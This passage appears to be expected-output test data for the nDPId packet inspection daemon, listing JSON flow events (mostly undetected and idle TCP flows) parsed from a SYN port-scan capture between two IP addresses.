+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","ndpi": 